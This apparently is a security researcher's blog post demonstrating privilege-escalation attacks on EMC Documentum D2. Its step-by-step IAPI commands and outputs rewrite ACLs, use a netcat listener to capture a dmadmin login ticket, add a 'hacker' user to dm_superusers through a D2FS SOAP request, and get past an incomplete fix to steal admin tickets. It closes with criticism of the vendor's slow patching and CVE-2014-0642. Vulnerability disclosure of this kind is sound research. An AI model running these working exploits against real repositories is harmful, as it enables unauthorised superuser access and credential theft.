Second dive into D2 security

Read previous one.

D2UpdateChildACLMethod

API> retrieve,c,dm_acl where object_name='dm_acl_superusers'
...
45022483800001bc
API> dump,c,45022483800001bc
...
USER ATTRIBUTES

  object_name                     : dm_acl_superusers
  description                     : ACL of superusers used for Docbase Administration
  owner_name                      : d2
  globally_managed                : F
  acl_class                       : 0

SYSTEM ATTRIBUTES

  r_is_internal                   : F
  r_accessor_name              [0]: dm_world
                               [1]: dm_owner
                               [2]: admingroup
  r_accessor_permit            [0]: 1
                               [1]: 7
                               [2]: 7
  r_accessor_xpermit           [0]: 0
                               [1]: 0
                               [2]: 0
  r_is_group                   [0]: F
                               [1]: F
                               [2]: T
  r_has_events                    : F
  r_permit_type                [0]: 0
                               [1]: 0
                               [2]: 0
  r_application_permit         [0]:
                               [1]:
                               [2]:
  r_template_id                   : 0000000000000000
  r_alias_set_id                  : 0000000000000000
  r_object_id                     : 45022483800001bc

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_has_required_groups           : F
  i_has_required_group_set        : F
  i_has_access_restrictions       : F
  i_partition                     : 0
  i_is_replica                    : F
  i_vstamp                        : 0

API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
[DM_API_E_NO_MATCH]error:  
   "There was no match in the docbase for the qualification: 
      dm_method where object_name='dm_GroupRename'"

API> create,c,d2_acl_config
...
000224838000012b
API> set,c,l,object_name
SET> ACL of superusers used for Docbase Administration
...
OK
API> append,c,l,accessor_name
SET> dm_world
...
OK
API> append,c,l,condition_attr_name
SET>
...
OK
API> append,c,l,condition_attr_value
SET>
...
OK
API> append,c,l,accessor_permit
SET> 7
...
OK
API> append,c,l,accessor_xpermit
SET> 0
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2UpdateChildACLMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -acl_config_name "ACL of superusers used for Docbase Administration"
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
100224838000056e
API> get,c,l,_permit
...
7

D2RefreshCacheMethod

nc:

nc -l 7777

api:

API> create,c,d2_options
...
000224838000012c
API> append,c,l,client_urls
SET> http://localhost:7777/
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2RefreshCacheMethod,
     ARGUMENTS,S,'-docbase_name d2 -password "" -all true',SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002c87
  result_doc_id                   : 0902248380002c87
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> getpath,c,0902248380002c87
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/0a/b6.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/0a/b6.txt
==== START ======================================================================
...............
Refresh cache URL http://localhost:7777/servlet/..._password=DM_TICKET%3DT0...

nc:

GET /servlet/RefreshCache?_docbase=d2&_username=dmadmin&_password=DM_TICKET%3DT0... HTTP/1.1
User-Agent: Java/1.7.0_51
Host: localhost:7777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

D2WF{LaunchScheduledWorkflows, LifeCycle, ReceiveTaskMail, SendTaskMail}Method

If we execute method with SAVE_RESULTS=T we can get user ticket:

==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : ...
User  : d2_mail_manager
Domain  :
User password : DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9u...
New session manager creation.
Session manager set identity.
Session manager get session.
Tasks found : 0
==== END (0.166s) ================================================

D2FS

api:

API> retrieve,c,dm_user where user_name='hacker'
...
1102248380000541
API> retrieve,c,d2_options
...
000224838000012c
API> dump,c,l
...
USER ATTRIBUTES

  config_security_group           :
  client_security_group           :
  node_admin_security_group       : admingroup
  forbidden_copy                []: <none>
  client_urls                   []: <none>
  enable_compare                  : F
  attribute_list_display_mode     : 0
  node_user_security_group        : admingroup
  node_group_security_group       : admingroup
  node_group_user_parent          : node_admin
  node_group_display_all          : T
  dfc_validator                   : T
  in_create_config              []: <none>
  url_allowed_actions           []: <none>
  lock_config                     : F

SYSTEM ATTRIBUTES

  r_object_id                     : 000224838000012c

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_is_replica                    : F
  i_vstamp                        : 2

API> set,c,l,node_user_security_group
SET>
...
OK
API>
save,c,l
...
OK

soap:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
           xmlns:con="http://www.emc.com/d2fs/services/content_service"
           xmlns:com="http://www.emc.com/d2fs/models/common"
           xmlns:prop="http://www.emc.com/d2fs/services/property_service" 
           xmlns:att="http://www.emc.com/d2fs/models/attribute"
           xmlns:con1="http://www.emc.com/d2fs/models/context">
   <soapenv:Header/>
   <soapenv:Body>
      <prop:savePropertiesRequest com:id="1102248380000541" >
         <con1:context uid="2" login="hacker" password="hacker">
                <con1:repository com:id="2" repositoryName="d2" serverVersion="7"
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
         <!--Zero or more repetitions:-->
         <att:attributes name="list" type="2" value="group_membership" />
         <att:attributes name="user_group_name" type="2" value="dm_superusers" />
      </prop:savePropertiesRequest>
   </soapenv:Body>
</soapenv:Envelope>

api:

API> retrieve,c,dm_group where group_name='dm_superusers'
...
1202248380000101
API> dump,c,l
...
USER ATTRIBUTES

  group_name                      : dm_superusers
  group_address                   :
  users_names                  [0]: hacker
  groups_names                 [0]: dm_superusers_dynamic
                               [1]: dcs_privileged_users
  owner_name                      : d2
  is_private                      : F
  description                     :
  globally_managed                : F
  alias_set_id                    : 0000000000000000
  group_source                    :
  group_class                     : privilege group
  group_admin                     :
  is_dynamic                      : F
  is_dynamic_default              : F
  group_global_unique_id          : d2:dm_superusers
  group_native_room_id            : 0000000000000000
  group_directory_id              : 0000000000000000
  group_display_name              : dm_superusers
  is_protected                    : F
  is_module_only                  : F

SYSTEM ATTRIBUTES

  r_modify_date                   : 4/19/2014 22:54:42
  r_has_events                    : F
  r_object_id                     : 1202248380000101

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_all_users_names            [0]: hacker
  i_supergroups_names          [0]: dm_superusers
  i_nondyn_supergroups_names   [0]: dm_superusers
  i_is_replica                    : F
  i_vstamp                        : 4

Is it worth to treat flu if patient has cancer?

Here I described vulnerability in D2GetAdminTicketMethod docbase method, after that EMC released D2 4.2 where they have started encrypting return values passed through c6_method_return object, but their solution was still vulnerable, now in D2 4.2.1 they made a decision to treat snots instead of increasing technology level of D2. Note, that security advisory is still not published:

that according to the statements provided above means that EMC does not “want to inform customers about a new or updated recommendation on security best practices”.

Fortunately, EMC coders neither know the product they are trying to develop, nor read documentation. Follow my hands:

API> create,c,c6_method_return
...
000224838000011f
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -method_return_id 000224838000011f 
       -scope global 
       -timeout 3600
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> revert,c,000224838000011f
...
OK
API> get,c,000224838000011f,message
...
AAAAEFRN36mfm+NAm49DQAZol1fSBbIgoELusFMnk4eE6r3qNPm/83NDxqiFyoe7Yt/GOjASn6v2
v2XjSaJq5MqGK8PgrNPbNz5KSAzxcKTWorJym/7ceZsp9l5pSUcDr1mj8xKg0M/iH8AIS8ZGZ9/L
2bd1FOth86ISN2OnAIOAlzh32I0/YcLYt7nSSfFWDL9H9qzzkp6Za/NeZt4Z0kE1gYNPaVrlPD4D
qC4bcSb3p54VeAZCVOgpUp3sJ+8kevoRQSKckOTSinBYF4qQa9pnNYQx8wczFk2/pM0pkCdDigyT
uOluf/e5kmAui7LLr7LkeBYiKBXaJg72sDT2pKjWi6byYIQ/fim57QrxXR608Pw0meiADtHQXARF
c9PtRvavRM7+m1HrfcRAML7qFUJCrIjDhEf/MTA95ZPYM3tdp2aEcq0EspD4Cn//iwVW9DK5Vt5c
AmtGRUfA0rHB6UvGhWbH5hQb9itZCP3lMDEjBr2B/3jbBC+CuMvK049j1rBxV5h1XJGhjJ+oMJWg
kmvFAjoZJNuqUWCqWLHn+WyO5I5DA54qUtw/SERO1srCPP6jYuE2Ym6WaVRXDhzZCjQLz+fbciba
qSbTFdeXQFZAO2s24mKx3tetyAp9nS04pAfTyFlLsMN83LRIGCUwij3BrfTY4X9wq4WqQiAT3a8M
jHrCXpd/5tWLMVPm/0jSSgj/SMtzU4bVBHKoIFclzLq+ciIsy9hVKdV8dQBfWzt3brQqGv8H2TvR
VlTxwTJWLZ/chujhwmWBN/28tXzK6EhLs5mSVaJ/SI7A4VhEq3qtileKaSULKSZiZ4sIT2nFAG7r
vBDGiEGQ/iG7jITFWYq4boou305kfYuPqM1U0E1qo8UQ

API> ?,c,update c6_method_return object 
     set parameter_name[0]='-timeout', 
     set parameter_value[0]=(select message from c6_method_return 
        where r_object_id='000224838000011f') 
     where r_object_id='000224838000011f'
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."


API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod,
     ARGUMENTS,S,'
        -docbase_name d2 
        -password "" 
        -method_return_id 000224838000011f 
        -scope global -timeout 3600
     ',
     SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002a67
  result_doc_id                   : 0902248380002a67
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> get,c,000224838000011f,message
...
AAAAEBBMjU2FE27RAOiKSkZdJZM7tl1ht+LhqjvPsmr9DPg3nVgGFyROrETPX6Wy8uuEWbtKSWs3
MNr8qe3EBNTejbieKZ2YzzUY/46fLdbOQFInczwrNCBoWF9zBnTlhoHK1f+ctpm9nUsK2wJbDZXb
mk6+1VO5RsUEuFV/qux5LBdXpIr7dRornpDJiBP5hoPILObq4++KvBfhZjaPxEnoOMksfwgmU8XC
oTady3QQNIpgnFdwKf6dOzSbmj3tsyycqul+YZ9Dqeq8dq532RW7/9l2uS/v8AoXsFeegyCada5m
KMh1gjtnkntIjk/i+sZoz1l8ilyNQs8d5dc5aIbvDCMWaxJgaUMOnPSVogj+d8poAoLfesOsuiCA
+0zkRrMBDuInW1gCAgNMHdKPaoO3nU1UgooLuV++w+OXawTyoP+oaVR7K4/q4Yy7AmH+r2LRZdT6
EELz2aJ/R7ao+OEUJQvuilxFcsQBJ4iIN5WzDCqzp9xa4wUtPkxmYXcuZmh+R5fHLo8OGop8lU38
NcnB7uGIBf9hdDfK92Ac3m/snRc2W4RE4pknixFIMumpqShMzkjBLZrPVYbf93E8b7LghlxCZ+6C
XM/HGowQd2ZILSn7HnKW7dWk+w8OJBl8n8cmgmIrxsjo0XJRKFy930MqREaAqZaMwbSfs0st6q4Y
EKki2b9HPicRPSTzmpXEnLrxe85taV3If5mLQelbeJcSoMNBpl7nC0FIcr4N1QHaTKtaRzeuUZQI
kmE8osy7RfiR9vuTWM6WoqpLt/eZCzancyS7tg6sjfp2eOFORCiSQ7loWaxLRDcze6rY+Ceb1LB2
RCZoV0CVzEz64lf7EC6SPPEGTi27QRZt4hnu/2w64YyN
API> get,c,000224838000011f,error
...

API> getpath,c,0902248380002a67
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/09/e1.txt
==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : {-docbase_name=d2, 
    -method_return_id=000224838000011f, 
    -password=, 
    -class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
    -scope=global,
    -timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp....
}
-Scope : global
-TimeOut : 3600
D2Method.passphrase MD5 : default
-SingleUse : true
D2Method.passphrase MD5 : default
==== END (0.095s) ================================================

It’s already second try to fix D2GetAdminTicketMethod vulnerability, and fix is still incomplete and wrong, what a shame, EMC can’t fix high-severity vulnerability within already 5 months.

About restricted folders

On April 10, 2014 EMC announced CVE-2014-0642:

EMC Documentum Content Server may be vulnerable to an information disclosure vulnerability that may potentially be exploited by malicious users to gain unauthorized access to metadata. This is due to improper authorization checks being performed when trying to access metadata from folders outside of restricted folders configured for Content Server users. This vulnerability is only limited to reading the metadata as the malicious user is not able to gain read/write access to the content itself.

The researcher of this vulnerability is Yuri Simione, he is even going to publish “exploit” (however it took 10 minutes for me to understand how to exploit vulnerability, but I’m not going to publish any related information). Initially I was confused by the following thing: Yuri writes that he discovered vulnerability in January 2014, EMC has written that vulnerability is fixed in CS7.1SP2 (released on March 1, 2014), so it takes just one month to fix vulnerability (note that usage of restricted folders feature causes wrong results for some queries). EMC is trying to fix multiple XSRFs more than year and still does not get any success, privilege escalation vulnerabilities was discovered by me in November 2013 and those vulnerabilities are still not fixed, but it’s worth to fix low-impact vulnerabilities within a month, what a shame!
Continue reading